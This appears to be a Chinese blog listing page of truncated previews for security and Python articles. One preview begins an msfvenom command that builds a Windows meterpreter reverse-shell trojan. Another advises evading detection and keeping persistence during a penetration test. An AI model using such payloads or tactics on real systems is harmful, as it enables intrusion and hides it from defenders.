原创 splunk總結

1.不同版本splunk下載 https://www.splunk.com/page/previous_releases#x86_64windows 2.插件下載地址: https://splunkbase.splunk.com/

原创 BurpSuite安裝及使用教程

Burpsuite的超詳細安裝教程 百科介紹 Burp Suite 是用於攻擊web 應用程序的集成平臺,包含了許多工具。Burp Suite爲這些工具設計了許多接口,以加快攻擊應用程序的過程。所有工具都共享一個請求,並能處理對應

原创 nmap掃描主機參數詳解

Nmap簡介 Nmap(Network Mapper) 是一款支持各種操作系統的開源網絡掃描工具。主要用來進行主機發現、端口掃描,並通過端口掃描推斷運行系統以及運行軟件版本。 -sL 簡單掃描列表目標 -sP: Ping Sca

原创 suricata規則學習記錄

Suricata快速模式(fast_pattern)確定解釋 如果在規則中明確設置了’fast_pattern’關鍵字,Suricata將使用它作爲快速模式匹配。fast_pattern關鍵字只能按規則設置一次。如果未設置“fas

原创 python讀寫excel文件詳解

python讀寫excel我比較喜歡使用pandas工具,實在太方便了,這裏首先介紹下pd.read_excel參數 import pandas as pd pd.read_excel(io,sheetname=0,usecols

原创 linux下防火牆配置

簡介 簡單來說Netfilter管網絡,selinux管本地。SELinux則可以理解爲是作爲Linux文件權限控制(即我們知道的rwx)的補充存在的 1、iptables是Linux下功能強大的應用層防火牆工具。iptables

原创 msfconsole製作後臺木馬獲取靶機shell

利用kali 製作木馬 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=***.***.*.***

原创 滲透測試步驟總結

滲透測試過程中不到萬不得已不要用爆破,會留下大量的證據 假設我們已經到目標的內網的某個設備上了,我們可以做什麼呢? 1、肯定是要做權限維持,爲以後的滲透先鋪好路,要不然很容易就會前功盡棄 2、瞭解目標系統的詳細版本信息 wmic

原创 ctf-pwn入門知識

CTF中的pwn指的是通過通過程序本身的漏洞編寫利用腳本破解程序拿到主機的權限 瞭解簡單的軟件防護技術: 棧保護:Canary 堆棧不可執行:NX(No-eXecute) 地址隨機化:PIE(position-independen

原创 python文件讀寫函數總結

1.python讀取csv文件 #!/usr/bin/python # -*- coding: UTF-8 -*- df = pd.read_csv(filepath,usecols=['func_name'

原创 python將列表寫入CSV文件

python將列表寫入CSV文件,注意 writer.writerow([line]),必須將line(字符串)轉化成列表,否則是每個字母佔用一個單元格 def writeToCSV(filter): with open(

原创 vbox搭建kali虛擬機及密碼修改

1.清華下載源 https://mirrors.tuna.tsinghua.edu.cn/kali-images/ 2.修改root密碼 https://blog.csdn.net/weixin_46192679/article

原创 ATT&CK調研

ATT&CK(Adversarial Tactics, Techniques, and Common Knowledge ) 1.網址 https://mitre-attack.github.io/attack-navigator

原创 ctf-misc總結(二)

文章目錄常用在線網址常用工具1.已知n,c,e,求m2.已知n,c,e=3,爆破3.廣播攻擊,已知多組n和c4.模不互素,已知兩組n,c,e5.共模攻擊,已知兩組n,c,e,其中n相同6.wiener_attack7.已知n,e,

原创 vbox設置kali虛擬機與主機共享文件夾

1.vbox設置共享文件夾如下圖 2.在kali虛擬機裏面創建一個文件夾,例如/mnt/kali_shared,執行如下命令: sudo mount -t vboxsf kali_shared /mnt/kali_shared